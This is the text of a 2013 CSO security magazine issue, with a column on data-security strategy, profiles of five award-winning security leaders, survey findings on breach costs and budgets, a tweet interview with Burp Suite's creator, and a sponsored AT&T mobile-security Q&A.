To truly improve data security, every business must first consider a few key things: What are you protecting? What is it worth to you? What are you protecting it against? What are the consequences of failure? These questions also need to be asked repeatedly and regularly to accommodate the shifting demands of employees, customers and other stakeholders, as well as evolving compliance standards.

The modern data security challenge is made even more complex by employees accessing company resources internally and externally by whatever means are at hand, including untrusted cloud platforms and personal devices. While rarely intentionally malicious, these actions add identity-management and user-authentication problems to a threat list that already includes data loss, malware, exploits and hackers. These multi-layered challenges can only be met with a blend of technology, consultancy, commitment and a genuine willingness to adapt.

Businesses, however large and established, should never be reluctant to turn to external partners for help maintaining robust data protection, addressing industry compliance issues and establishing a practical security strategy. Although integrity is always paramount, many large organizations simply cannot afford to take their eye off their core business goals, and their internal resources often do not have time to develop a practical approach to resolving information security challenges.

In the real world, it’s OK to ask for help to resolve complex security, risk and compliance issues. Often third-party insight from consultants is critical to developing a complete end-to-end solution that is relevant and scalable, meets an individual business’s specific objectives, and doesn’t merely address generic issues or push individual security components. Specialized consultants who constantly monitor the latest threats and have worked with a range of firms and tackled diverse security challenges should always be able to embed themselves with internal experts and become integral members of an information security team. Sometimes a business needs that extra layer of expert advice to gain the confidence it needs to make security decisions at business, management and operational levels.

Data security concerns span every vertical sector, and all IT managers must continue to mitigate these issues by taking the smartest precautions they can to strike a balance between security, productivity and cost. A resilient, customized plan should take into account perimeter security, intrusion detection and prevention, content security, authentication services and Web application security. But perhaps just as important is establishing a clear methodology. Improved visibility enables any organization to make more informed investment decisions. Greater efficiency in meeting a unique set of data security challenges helps to optimize the use of available resources. Greater understanding of threats and the best actions to combat them helps balance risk management with commercial goals. A broader skill set and knowledge base gained from consulting an expert partner can help employees work more confidently and understand new technologies. Finally, tangible improvements and measurable successes lead directly to industry compliance with less work, meaning that standards and regulatory needs are met without pain and stress.

A thoroughly planned, practical security strategy will always improve protection levels while reducing costs. Businesses must take a risk-based approach: develop objective security plans that are prioritized and actionable; gain a better understanding of actual risks, costs and benefits; and then invest time, money and effort primarily in the areas of greatest value.

Achieving this demands cultural change, collaboration and measured partnerships, not just a stack of sophisticated security equipment. But the rewards couldn't be higher.

■ Chris Camejo directs assessment services at security consultancy Integralis.
CAREER

Forging Ahead: How Five All-Stars Get Stuff Done

Each of our 2013 CSO Compass Award winners adapts to the demands of their environment and finds a way to transform security BY LAUREN GIBBONS PAUL

Kim Keever
The Doer

VP of information security and controls at Coca-Cola, Keever uses her CIO experience and business contacts to get things done

FOR KIM KEEVER, SECURITY KNOWLEDGE (no matter how thorough) is not enough. Vice president of information security and controls for Coca-Cola, Keever and her team of 60 security staffers have the expertise to implement security technology and practices in addition to evangelizing security awareness.

To Keever, this is a key distinction. Some security groups are set up as subject-matter experts for the rest of the organization, advising on what to do and remaining silent on how to do it. Keever believes this approach undermines credibility. "You can't just be a security specialist. You have to understand how to get things done in the IT space. I could not just pick technology and hand it over to another group in IT to implement it,” she says.

Given her background, it’s unlikely Keever would ever take a backseat approach to any aspect of security. She began her career as an IT consultant in the mutual fund industry, specializing in cross-functional team management and disaster recovery and business continuity. This led to a post as CIO for Invesco's retirement group back in Atlanta, her hometown.

“I focused on all aspects of IT but had a special interest in ensuring controls were in place in environments, leading to a focus in security tools and audit practices," she says. When Invesco’s retirement group was sold off, Keever seized the opportunity to spend a few years at home with her young children.

In 2009, she was recruited to enhance controls for Atlanta’s Coca-Cola Enterprises (CCE), then the largest bottler in the Coke system. There, Keever led an effort to enhance access controls, and her role was seen as important when Coca-Cola moved to acquire CCE’s North American operations, which became Coca-Cola Refreshments (CCR) in 2010.

“They wanted to focus on aligning security with the Coca-Cola Company standards in this North American business unit,” she says.

Following the acquisition, CCR’s risk posture changed because it was now connected to its parent company’s environment. “Things had to be modified quickly. We had the added pressure of needing to align with a global company that had a different set of security standards,” she says.

Keever moved quickly to build her team, which she sourced both internally and externally. “I have a diverse group of people who had systems implementation experience, people that come from IT audit, and people that worked at the security vendors. My team is security-focused but business-minded and knows how to get things done.”

One of her team’s first initiatives was implementing a role-based identity- and access-management security infrastructure that allowed employees to serve themselves in many cases. For example, new hires are automatically provisioned and receive network access without having to go through the typical paperwork and manual processing. At the same time, Keever worked to simplify compliance with security practices for employees by easing password management through a cross-company password-management tool and a federation platform.

Since 2010, Keever’s team has delivered significant business value and reduced risk through a number of security initiatives, including raising security visibility and awareness, and implementing the first out-of-region disaster recovery capability for the North American environment. Keever also spearheaded development of a program to partner with audit and IT owners to develop root-cause resolution of audit findings.

Lately, she’s been focused on compliance with payment card industry (PCI) data security standards. She developed a center of excellence to serve as a centralized resource for this key area. The team evaluated compliance and mediated issues for PCI-relevant processes in the North American business as part of preparations for attaining tier one vendor status this year.

Keever’s accomplishments are impressive, even more so given that they took place during a tumultuous time in her personal life. In 2011, both of her hitherto vibrant parents got sick and died, one after the other. Work provided a much-needed distraction during that time, she says.

Understanding the business, its threat profile, drivers and objectives, helps Keever when discussing funding needs for key security initiatives. “From a funding perspective, it is easier for me to make a case because I focus on value to the business,” she says.

That is right in line with her belief that security people should be doers rather than just advisers. Having seen both ways of operating an information security organization, Keever comes down strongly in favor of her team implementing security technology as opposed to just advising the business and IT on security matters. “Your business can’t afford to have a team of subject-matter experts telling people what to do from a security perspective. You have to have them doing things and showing value,” she says.

“I feel very fortunate. Coca-Cola is a great company. It is really exciting with so much opportunity to succeed. It’s very focused on diversity, women, accepting of different needs, enabling a flexible lifestyle," says Keever. “It’s been very rewarding for me.”
Grant Lecky
The Visionary

Founder of the Canadian Security Partners’ Forum, Lecky went after his dream of elevating the security industry while keeping his day job

WHEN GRANT LECKY HAS A dream, he doesn't sit around and wait for someone else to make it come true. Instead, he does whatever it takes to make that vision a reality.

Case in point: In 2010, Lecky was finishing a master’s degree in security and risk management at the University of Leicester. He got to asking why security is not considered a true profession in the business world and what would have to happen to elevate its status in Canada.

"I kept hearing that the industry is fragmented. People don't know how to find other experts in security in Canada,” says Lecky. “There was no means to connect people. There was no body of knowledge.” The problem was exacerbated by a poor economy, the large distances between many Canadian cities and the relatively low population density.

The solution, Lecky believed, was not to create another industry association; there were already so many of those, and they were generally ineffective. Instead, he envisioned a new kind of organization, a partner to security associations and professionals, that would form an agile network for sharing best practices and other information, and he made it happen surprisingly quickly.

After finishing grad school and while working as the departmental coordinator for business continuity and emergency management at Citizenship and Immigration Canada, Lecky founded the Canadian Security Partners' Forum (CSPF) in 2011. His colleague Bonnie Butlin was at his side and instrumental in the launch, he says.

Roughly a year after its birth, the organization already had 80 association members; now it has 119. A nonprofit, the CSPF does not charge a fee for participation, and gets all of its small budget from sponsorships.

“We’re a friend to the associations," says Lecky. “In some cases, we are a magnifier for them. People have their associations, but they also have the forum to tap into and share best practices. It’s about cross pollination and making security [and] public safety more professional.” In his day job, Lecky evaluates security risk management, including hazards-related risks and business-disruption risks. “In my role, I have to build resilience for the organization. The way to do that is break down silos and share information,” he says.

Being part of the forum makes people more resilient professionals. “If we have a resource to tap into to develop a better understanding of the risks we face, we become more resilient individuals. The forum is a resilient entity thanks to its community of best practices," he says.

In a country with 33 million citizens, the number of security professionals likely totals in the hundreds of thousands. “The amount of information that can be shared is just unbelievable. Information and best practices can help them see different views and make different decisions,” says Lecky, who estimates the CSPF has the ability to reach out to millions of people all over the world in a matter of minutes via its email list, LinkedIn groups and association Facebook pages.

The CSPF is busily launching programs and events, including a Cybersecurity for Executives lecture series designed to raise security awareness. The group is also now working with its association members to develop a framework for dialog across security-related fields, including business continuity, emergency management, risk management, critical infrastructure protection, defense and intelligence.

Thanks to its fast start, the CSPF is now getting a lot of attention from security professionals in other countries who are interested in following suit. “I'm seeing other countries following our example or adopting a variation of what we're doing,” says Lecky. Australia, for example, is working on creating a security alliance.

Work on the CSPF might seem burdensome for someone, even without the additional weight of another full-time position and without the prospect of greater fortune. “I don’t like being bored,” says Lecky. “The reward right now is a job well done. I’m furiously stubborn. If there's something I feel needs to be done, I will just go and do it."
Scott Pettigrew

The Builder

Over the course of his eclectic career, Pettigrew, who’s now CSO at HMS, has assembled three security departments from the ground up

If someone had told Scott Pettigrew 20 years ago when he was first starting out that he would go on to build complete security organizations for three different large companies, he might have just taken a nap. Instead, at this point in his career, Pettigrew finds himself the architect of security programs for no less than Tandy Corp., American Airlines and his current employer, HMS—an achievement of which he is rightly proud.

Pettigrew’s security career began in 1994, when he was asked to run security at Tandy Corp., a family-owned leather goods company. “Security wasn’t such a developed area back then,” says Pettigrew, now vice president and CSO for HMS, a cost-containment firm that serves the healthcare industry. “There wasn’t the focus on security then that there is now. It was much harder to get things done, get budget.” A lot of the focus then was on basic user administration. Let’s just say the world has grown much more complex.

After a stint providing security advice for management consultancy Ernst and Young, Pettigrew was lured to head security for American Airlines in 2000, where there was a lot of tumult even before 9/11. “That was right when they were splitting from SABRE and just starting to hire IT staff,” he says.

As for security, the airline was lacking. Pettigrew had carte blanche developing the program. “They had so many problems on the IT security side the auditors said it was going to have to be a footnote on our next financial statement. So there was a lot of work to do at that point,” he recalls.

And then hijackers struck two American Airlines flights, along with a United flight, throwing the airline, the industry and the economy into turmoil. “We were implementing a security architecture [when] 9/11 hit and everything went crazy for the next year,” says Pettigrew. “I worked more in that year and a half than I ever had before.” He worked with the FBI during that time, and he’s still sitting on stockpiles of information that he can’t talk about thanks to a nondisclosure agreement.

After that, there was a much greater emphasis on security, both at American and throughout the industry. “Internal controls became crucial, and understanding patterns and data mining pretty much started then,” he says. Pettigrew remained for a year and a half after 9/11, but then he needed a break. “I just had to get away from that for a while.”

He opened his own security consulting firm, but “it wasn’t as easy as I thought it would be.” In 2004, he was asked to create the security function from the ground up for Baylor Health Care System, which gave him an understanding of healthcare. Four years later, with Baylor’s security program in good shape, Pettigrew was asked yet again to build a security organization, this time for HMS.

His reaction? “Oh my God, here I go again,” he says with a small chuckle. “But I realized those opportunities don’t really come along all the time.” At HMS, “I had one person for more than a year; now we will have 21 people at the end of this year” protecting 2,500 employees, he says, adding that finding good people with the right mix of technical and business skills is the most difficult part of his job.

Besides building up his staff, Pettigrew has excelled at working with a corporate culture that was less than welcoming to change in general and security in particular. “This started as a very small company. Over the last five years, it has grown exponentially,” he says.

When he joined in 2008, the culture was like the Wild West, with virtually no controls. Many employees had been at the company forever and were not inclined to change. Pettigrew’s right-hand man (and first security hire) George Macrelli, director of security assurance, says his boss succeeded in establishing early on why it was critical for the company to change its ways.

At the same time, Pettigrew managed to move the culture without being dictatorial.

CIO Cynthia Nustad says, “There are many security officers who have more of a cop-like or military sense of security. That persona might work great for certain types of businesses but may not work well in our industry. We are much more focused on finding the right balance of protection, reducing our risk and adding business value.” Pettigrew takes a calmer approach, which is right for HMS, she says.

Pettigrew says he is four years into a seven-to-10-year journey to complete his vision for security at HMS.

“Right now, I am very happy with where I am. It’s very rewarding,” he says.
Weatherford, a principal at The Chertoff Group, understands security from both governmental and commercial perspectives

Danuta Otfinowski

Unlike many CSOs, who seem to take a winding path to the role, Mark Weatherford likes to say he’s been working in information security his whole life. In grad school as part of his Navy service in the 1990s, Weatherford wrote a thesis on information security, an unusual topic at the time.

“It makes me cringe to read it now,” he acknowledges with a laugh. “No one talked about information security at the time.”

His last job in the service was running the Navy’s computer network defense operations and its incident-response team. “That set the course for my career,” he says. Following several years at Raytheon, Weatherford began working for state government, starting in 2006 as Colorado’s first CISO.

“I built that program. It was unique and groundbreaking at the time,” says Weatherford. Many states then had someone to head information security, but Colorado was the first state to enact legislation to elevate the topic of cybersecurity, according to Weatherford. “It was my first foray into the sausage-making of politics, working with a state senator and a state legislator, seeing the negotiations back and forth. It was very enlightening.”

Being the head of security for a state government—or indeed any governmental agency—requires a perpetual balancing act and careful compromise, as Weatherford learned. “Being a security guy, I want to be autocratic in a way that you simply can’t be in government if you want to get anything done.”

And then there’s the issue of funding, which came into sharp focus when Weatherford took a job as CSO for then-California governor Arnold Schwarzenegger. About a month after he started his new role, the state began experiencing major budget issues that went on for years. “My tenure there was marked by doing something with nothing. We had to become creative and resourceful,” he says.

At the end of that administration, Weatherford was lured by a friend to his first role in the private sector in years, at the North American Electric Reliability Corp., where he directed the cybersecurity and critical infrastructure protection program.

He relished the role. “I loved working in the electricity industry. It’s something tangible. We are all so dependent on electricity. It was exciting,” he says. And while the security budgets were hardly limitless, they were nowhere near as tight as in government. But his days in the public sector were far from over.

In the summer of 2011 he got a call asking if he was interested in working as a deputy undersecretary for cybersecurity at the Department of Homeland Security. DHS Secretary Janet Napolitano encouraged him to join the team. Weatherford wasn’t interested, frankly.

“I didn’t want to go back to work for the government. Knowing the bureaucracy and inertia in the government, I knew I would struggle with that,” he says. Eventually, he became convinced he would regret it for the rest of his life if he passed. “Very few people get an opportunity to do something like that,” he says. So he took the job.
He was pleasantly surprised at the dedication of the people working in the DHS cybersecurity and communications organization. “They do a lot with not a lot,” he says.

Figuring out how to share information between agencies and departments was a major part of his role. To do it, Weatherford worked on the National Cybersecurity and Communications Integration Center (NCCIC), whose job is to coordinate cybersecurity across the government—law enforcement, FBI, Secret Service, Department of Defense, private sector, states, and so on.

“It was refreshing. People who would never know each other or talk to each other would interact on a daily basis,” says Weatherford. “This group had been very immature and not functioning well. We helped turn it into a high-performance machine.” He credits his team for their work.

Leading up to the presidential election last year, Weatherford started looking around to see what else was out there, in case of regime change. The opportunities he saw were so exciting that he decided to make a move regardless of whether Obama got re-elected.

“I was like a kid in a candy store. I was ready to go back to the private sector,” he says.

As he looked at different companies, ranging from startups to large enterprises, he crossed the latter off the list.

“I didn’t want to get back into a bureaucracy.”

Consulting presented itself as the opportunity that would allow much more flexibility and autonomy. He joined The Chertoff Group in April this year.

“Most of my life, I have done operational jobs. I just wanted to do something different. I wanted to focus on cybersecurity and work with clients around the world. It has been an interesting transition,” he says.

“What I enjoy the most is getting to work with a lot of different companies. The companies that are calling us really need my help,” he says. “I am able to both satisfy my security jones and help companies from a strategic perspective.

“It’s been an interesting career. Who knows what else is in my future?”


Ira Winkler

The Awareness Crusader

To Winkler, reducing security risks comes down to creating the right culture rather than aiming for bulletproof technology

With a résumé that includes certifications, several books, and frequent speaking and guest columnist gigs, Ira Winkler is a recognized leader in the security industry today. Currently president of the 10,000-plus member Information Systems Security Association, Winkler is also president of consultancy Secure Mentem. Not bad for a guy who majored in psychology and says he wanted nothing to do with computers in his college days.

How did he get from there to here?

“No one else would hire me but the U.S. government,” says Winkler jokingly. In truth, he took an aptitude test on a lark while considering career paths senior year and discovered to his surprise he had a flair for the technical.

After gaining the requisite clearance, he took a job as an intelligence analyst with the National Security Agency. Winkler quickly realized that jobs working with computers paid better than those that did not, so he grudgingly took a position as programming support for cryptanalysis system development in field operations, where he spent three years. His background in intelligence taught him one thing: No one cares how you get the data; it’s the data itself that’s important.

This lesson served Winkler well in subsequent years, during which he hacked corporate information through unconventional means such as bugging the office of the Fortune 100 executive who hired him to do penetration testing. His goal was to get to the heart of the business value of a security breach, which is a much more relevant description to a business executive than the typical security terms, he believes.

After bugging his employer many years ago, Winkler walked into the executive’s office and reeled off detailed information about the company’s mergers and acquisitions and products under development.

“I said, ‘I have here everything you hold valuable to your whole company.’ That put a business value on it. He bumped up the security budget by $10 million and hired security officers.”

“Executives don’t care if you get on their network,” Winkler says. They figure other outsiders are probably on there already and it hasn’t hurt their business any. What’s relevant: the cost to the business—in dollars—of any past or imminent loss due to that security breach. Of course, proving your cost estimate is accurate is easier said than done.

In business, every decision requires a balancing act. In a perfect world, everyone would ensure that their networks were free from intrusions from foreign governments such as China, which is the main offender of late. But of course, that’s not always how it works out.

“They want to do business with China, so they’re willing to accept that some of their data will be lost in exchange for a larger portion of the Chinese market. It comes down to understanding the business risk: Here’s what we are preventing and here’s what it’s going to cost to prevent,” Winkler says.

It is critical, in his view, for security professionals to identify risks to the business and find cost-justified security measures to mitigate those risks. No CEO wants to hear he should spend tens or hundreds of millions of dollars to rebuild his computer network. After all, hackers will come right back the day you turn it on. What security pros must do instead is focus on securing the environment in a way that’s aligned with business value.

Equally important is to instill the entire organization with security awareness that goes far beyond simple training and aims to change individuals’ behavior. Secure Mentem, Winkler’s current company, offers a security awareness methodology that takes culture into account.

“Awareness is a continual process,” wrote Winkler in a recent column. “It is not a program to tell people to be afraid to check their email.”

“Security is all about the human, from start to finish,” he says. “There will always be a malicious entity out there trying to get on your network.” But what Winkler calls the “malignant” security issues—employees clicking on unverified attachments, for example, or that old standby, writing passwords on sticky notes—can cause even more damage.

For those issues, there is little to be done but raise awareness. Winkler has made that cause his lifework.
INDUSTRY CHATTER ON TWITTER

Infosec analogies are like Jagermeister: sweet, but get you into trouble.

Gal Shpantzer @Shpantzer

There is no right way to do information security, but there are A LOT of wrong ways, and I’ve seen hundreds of them.

Info Security Jerk @infosecjerk

“As someone who is passionate about information security...” Voicemail from vendor who used a phrase from my LinkedIn profile. Felt dirty.

Steve Werby @stevewerby

Becky Bace at the NSA claims the NSA helped capture me. I wonder what unconstitutional methods were secretly used?

Kevin Mitnick @kevinmitnick
Organizations are investing to improve their risk posture, but, as our 11th annual Global Information Security Survey finds, breaches and their associated costs continue to rise.

By George V. Hulme

Security professionals are being hammered by a powerful combination of forces: As IT systems get more difficult to defend—more open, mobile and shared—cyber-threats are also evolving to more swiftly penetrate enterprise defenses.

That is one of the core findings of the 11th annual Global Information Security Survey, conducted by PricewaterhouseCoopers and CSO. The survey also found that despite many of the more than 9,600 execs surveyed saying that their organizations have increased IT security spending, the number of attacks they’re enduring and the costs of those attacks keep rising. And not only are attacks increasing, but so are the costs per incident, with the average losses per incident up 23 percent year over year. The number of those reporting losses of greater than 10 million per incident is up 75 percent from just two years ago.

An Abundance of (Over)confidence

Despite those setbacks, this year’s survey reveals an unexpectedly high level of confidence in the robustness of respondents’ security efforts. A whopping 84 percent of CEOs and 82 percent of CIOs believe their programs are effective in their current state. Even CISOs, a traditionally cautious bunch, are only slightly less sure, with 78 percent expressing confidence.

This optimism is maintained despite the fact that the number of security incidents detected has risen considerably year over year: from 2,989 reported in 2012 to 3,741 in 2013. A full 18 percent of respondents report not knowing the number of incidents they detected.

This isn’t to say that enterprises aren’t taking many of the right steps to protect their data—they are. The survey shows that even those enterprises that haven’t been taking adequate precautions plan to do a better job in the future. Many report they’ll soon be setting minimum security standards for external partners, customers and suppliers, as well as instituting employee security awareness training programs.


[Chart: Information Security Budgets Increase Significantly. Security budgets average $4.3 million this year, a gain of 51 percent over 2012. Organizations understand that today’s elevated threat landscape demands a substantial boost in security investment. Average information security budget: $4.3M; years shown: 2009 through 2013.]

Not surprisingly, many security practitioners disagree with this year’s survey respondents about the overall state of IT security. “The bad guys basically go where they want to go and do what they want to do, and they’re not being stopped. Maybe for every one organization that’s effectively stopping attacks, there are 100 that are being breached,” estimates Eric Cowperthwaite, CISO of Providence Health and Services.

When those breaches do occur, the impact remains high: 35 percent of respondents report that employee records were compromised, 31 percent report customer records were compromised or unavailable, and 29 percent say internal records were lost or damaged. Also significant: reports of lost or damaged internal records this year jumped 100 percent from last year.

Those losses are occurring despite increased resources being directed at the security challenge—security budgets averaged $4.3 million this year, a gain of 51 percent over 2012.

Yet despite the spending, enterprises are still playing catchup. As IT organizations master the security and management of one set of technologies, something disruptive and new always comes up, whether it’s virtualization, cloud, the consumerization of IT purchasing or increased worker mobility. And it’s this change that, if not properly managed, can create so many hazards for CIOs and their security teams.

A Proper Alignment

One of the best ways to ensure that enterprise technology doesn’t rush past IT’s ability to secure it is to keep business management and IT security management aligned.

One of the big reasons that business management and IT security remain misaligned, says Mike Rothman, president of independent research firm Securosis, is the lack of proper metrics available to measure the business impact of security activities. “That remains a huge gap. Business managers understand business metrics, and IT security—for better or for worse—doesn’t lend itself to those business impact metrics. And there is the disconnect,” Rothman says.

“In the last 10 years, we fought just to get the CISO recognized and have a seat at the table,” says Tim McCreight, CISO for the government of Alberta. And although CISOs are more widely recognized now, they don’t all have the same levels of influence. The position means different things in different organizations, and all those organizations are at different levels of security maturity. In some places, the CISO is buried deep in the management structure, while in others it’s equivalent to a vice president and reports directly to the C-suite.

In too many organizations, decisions regarding new IT projects, application design and deployments, and procured services are made without getting any input from IT security groups. And when security is actually brought in, it’s often toward the very end of the initiative, when it’s too late to offer constructive advice or establish cost-effective security controls.

To improve his organization’s ability to make smarter risk-based decisions, McCreight shifted Alberta’s CISO role to that of a risk adviser to the business, not a service provider. For instance, a business manager recently asked McCreight to endorse the architecture for a new initiative.

“I said no, it’s your architecture,” he says.

Now, individual business unit owners accept the risk posture of their systems. How did McCreight get the organization to that point? It required that everyone speak the same language when discussing risk.

Something as seemingly simple as determining what low, medium and high levels of risk mean can in reality be incredibly complicated, because “acceptable risk” means different things to different people depending on their experience and personality. To get everyone aligned, McCreight assembled a team of subject-matter experts from various business units and management teams, including representatives from business continuity teams, IT teams and the ranks of project leaders. “We got everybody into a room, and they didn’t come out until they determined their shared definition of high, medium and low risk—and they understood what the likelihood and impact [of a security event] meant to them,” he says.

Those meetings took a year. “Now, when we talk about a high risk—whether it’s a physical security risk or an IT risk or hiring a person—we all know what ‘high’ means,” McCreight says.

To the Cloud

Cloud computing is changing how many organizations view risk. This year, 47 percent of respondents report using cloud computing, and of those using cloud, 59 percent believe their security posture has improved, yet only 18 percent include rules about cloud in their security policies. Software as a service remains the most widely adopted cloud service, staying steady at 69 percent adoption, and platform as a service shows the strongest year-over-year growth, increasing from 29 percent to 37 percent.

Martin Sandren, enterprise architect for security at Blue Cross Blue Shield, explains how he believes the insurer has dramatically reduced risk by moving to the cloud. “We have made a huge shift to cloud—about 80 percent of all the systems we build today are cloud-based. Almost nothing goes into our internal systems anymore,” Sandren says.

This move, Sandren explains, has helped mitigate a considerable amount of the risk that results from the security practices of its smaller partners. “As a payer organization, we have a lot of small suppliers who run with a very small IT operation, but they’re really good at a specific business task. This is a potentially risky situation, especially when sharing regulated data,” Sandren says.

“For these businesses—and that’s a lot of that [type of] business—the cloud has made it much easier for them and us to manage risk,” Sandren adds. Before, these 10-person companies usually ran off a couple of servers sitting under someone’s desk. “Now, these same small businesses have their servers hosted on a cloud provider that we vetted. Suddenly they have the same kind of physical security we find in an enterprise data warehouse. That’s helped us a lot in quantifying risk,” he says.

Steve Phillips, CIO at Avnet, the $25.5 billion electronics distributor, also puts cloud vendors through a vigorous vetting of their security capabilities and maturity. “You can’t outsource risk or reputation damage should something happen,” says Phillips. “That’s why we put our providers through a serious evaluation—not a simple check-the-box exercise—to make sure they have the capabilities to provide the level of security we expect,” Phillips says.

To ensure that IT and cloud service providers live up to their claims, Phillips also makes sure that their contracts include certain clauses, such as one requiring the provider to relay information on any breaches and another giving Avnet an escape hatch if the breach is serious enough to warrant a termination of the relationship.

[Chart: Respondents Detect More Incidents. The number of incidents detected in the past 12 months increased by 25 percent. Also troubling: Respondents who do not know the number of incidents detected by their organizations doubled over two years. This may be due to continued investments in security products based on outdated models. Average number of security incidents in a year: 3,741; years shown: 2011 through 2013.]

[Chart: Attacks Backed by Nation States Make Headlines but Remain Rare. Only 4 percent of respondents report security incidents perpetrated by foreign nation states. Hackers represent a much more likely danger. Estimated likely source of incidents: hackers, competitors, organized crime, activists, terrorists, foreign organizations, foreign nation states. Values legible from the chart: 32%, and 4% for foreign nation states.]

A  Step  Behind 

Why  are  the  costs  of  data  breaches 
rising  despite  the  substantial 
increase  in  security  investments 
among  the  enterprises  surveyed? 

Certainly some of it can be attributed to the rising costs of responding to breach disclosures, increased threats, and a higher priority placed on cybersecurity. However, a big part of the rising cost is that too much emphasis is placed on preventing and spotting attacks, when organizations should also be developing the ability to respond when the inevitable occurs.

Many respondents still can’t adequately identify or respond to breaches. In fact, only 61 percent inspect their inbound and outbound network traffic, and fewer than that had used malware analytics to fight advanced threats, or used security event and information management systems to detect potential incidents.

“We are all taught in security 101 to put the basic defensive controls in place first. Most don’t get to that point, let alone beyond it. However, there are companies out there, more mature companies, that have built in the ability to respond,” says Rothman. “The problem is that they are not the general population. Typically, if they see a breach—if they even see it in the first place—most will call their service provider,” he says. And even among companies that do invest in the technology needed to detect and respond to attacks, many don’t have the expertise on staff to take full advantage of the tools’ capabilities.

If you can’t see the threats, it’s almost impossible to respond to them intelligently, and this reality is reflected in the survey results. Only 18 percent of organizations reported being extremely effective at reporting, managing and intercepting cyberthreats. The majority reported that they were minimally effective or did not know how effective they were.

The industry is “too heavy-handed when it comes to investing in preventative controls,” says Jay Leek, CISO at private equity firm The Blackstone Group. “We have not invested enough in detective and reactive—what I call ‘response’—controls. I believe that we need to focus more on how well we can identify and respond to attacks,” he says.

“If you look at security programs in large organizations, they probably spend 70 to 80 percent of their budget on preventative measures. These budgets, I found, also largely correlate to where resources are typically focused, leaving only 20 to 30 percent focused on detective and reactive controls,” Leek says.

“It’s clearly not working,” he adds. “And I would think that incident response would be an ideal place to focus today because the nature of IT systems and their complexity means the chance of one experiencing a security breach has got to be high. You have to assume you would need the ability to respond one day.”


George V. Hulme is a freelance security and technology writer based in Minnesota. Follow him on Twitter: @georgevhulme.
Ten Tweets: Dafydd Stuttard

@PortSwigger

This month, CSO tweeterviews Dafydd Stuttard about his security philosophy, his inspiration for his web app testing tool Burp Suite, and his affinity for a nice glass of port.


CSO: Tell us first about your background in the industry. How did you get started in security?

Dafydd Stuttard: My first job was as an IT auditor, which was pretty dull. I got to know some much cooler people doing pen testing, who taught me about it.

And what first appealed to you about pen testing? As opposed to auditing, did you find it exciting?

I got to solve weird problems and be devious, both of which appealed.

Fun! OK, tell us how you came up with the @PortSwigger handle.

It’s a pun. When I started, most tools had “port” in the name (port scanner, etc.).

I was quite partial to a glass of port.

A much tamer answer than I anticipated.

So being in security has not led you to be a habitual portswigger?

Not exactly. I pretty much only do Web apps these days, and those buzzwords don’t sound as quaffable.

LOL. What would you point to as one of the most major changes in security since you first started in the profession?

More attack surface, more threats, more determined attackers, more government-sponsored attacks. Very marginally improved defenses.


What, in your opinion, could the industry do better to score higher than “marginally improved” when it comes to defenses?

Unfortunately attack/defense is too asymmetric a challenge, and defense is not (currently) commercially critical. That may change.

Speaking of defenses, you’re the creator of the Burp Suite for performing security testing on Web apps. What was your inspiration?

I was a lazy pen tester and wanted to automate my work. The tools at the time were primitive, so I started writing my own.

Interesting. And what about today? What’s your security philosophy? And how do you apply it to your daily work?

I can’t say I have a burning desire to secure the world. I just like writing sectools. On a personal level, I err on the side of paranoia.

Complete this sentence: If I weren’t working in security, I would ______.

I would probably be doing something geeky with computers, writing a lot of code, and working just as hard.

Sounds like your career is right where it should be then! OK, time to pass the bottle of port. Who should CSO tweet with next?

@stevelord would be fun—he organizes the great #44Con. And @stevelord does look exactly like his profile pic, by the way.
Andy Daudelin

VP OF SECURITY SERVICES FOR AT&T BUSINESS SOLUTIONS

Andy is responsible for scaling the company’s security services across its global network and integrating them into the AT&T business solutions portfolio. Previously, he served as the VP of IT Services and Vice President Global Engineering. Prior to joining AT&T, Andy worked as a digital circuit designer for the U.S. Army.

FOR MORE INFORMATION

visit www.att.com/toggle

To view a video webcast with Andy and IDC’s Chris Christiansen, go to www.cso.com/webcasts/att.
A Layered Approach to Mobile Security

Moving beyond a device-centric strategy without adding complexity

The explosion of mobility and mobile devices has shattered the concept of securing company data behind firewalls and tight perimeters. IT leaders need an approach to mobile security that goes beyond simple device management. The answer turns out to be layered management.

What impact has the explosion in mobility had on the overall threat landscape?

First, you no longer have the ability to control your corporate assets within a perimeter. Mobility to me is not only devices, such as tablets and mobile phones. It’s also data and application access in the cloud. While this gives users great flexibility and options, it means the security risk landscape has expanded exponentially. Second, mobility—and especially bring-your-own-device policies—means you have to protect both corporate and personal devices accessing your network. With so many personal devices entering the workspace, employees may not be careful about what apps they load or what sites they visit.

Finally, in general, the overall security threat landscape has increased and there are more entry points. You find that hackers are ramping up their efforts, so attacks are becoming more frequent, broader in scope, more complex, and harder to defend.

How are the drivers of mobility—things like productivity and agility—affecting security challenges for IT?

IT doesn’t have the inherent control that it used to have, so IT needs to be more proactive in establishing safety mechanisms. Second, these drivers amp up the requirement for speed.

Five or ten years ago, we thought nothing of a major IT project taking months or years. Today, we think in terms of weeks and days. This puts pressure on IT to be able to react very quickly. Many organizations are going outside their four walls to build an adaptive strategy and they are evaluating some of the newer platform solutions that are holistic in nature, versus disparate mainstream management tools.

How are IT and security staff getting ahead of the security issues resulting from use of consumer-based applications?

IT is looking to have checks and balances built into filtering. That means stronger web security services, URL filtering, and other things that can check the safety of an app before it’s loaded onto a device. This space in general is new and IT staffs are still trying to figure it out. It’s no longer just 50 or so corporate applications that are tightly controlled. You’ve got to consider any of the myriad of apps that one of your users can get easily from an apps store.

The focus of a lot of mobile security strategy today is on the device. Do you see anything wrong with that?

Everything is wrong with that device-centric approach. While the device does need to have focus, it’s really just the tip of the iceberg.

CIOs need to employ a comprehensive mobile security strategy. One that takes into account the networks, the data and the device. It’s really about protecting the network connectivity, securing the organization’s data and applications, and keeping malicious codes off their devices.

How is AT&T helping organizations deal with the mobile security concerns of BYOD?

AT&T has a layered approach to end-to-end security. We start with strong device management and mobile security capabilities, then layer in highly secure connections, similar to protection offered behind corporate firewalls. To provide this without complexity, we use AT&T Toggle, a highly secure mobile workspace management solution, which offers anti-virus and malware protection for Android™ devices and can be integrated with network security controls such as existing VPN solutions. What makes this simple is users have an integrated front end, and everything else is built underneath.

Android™ is a trademark of Google Inc.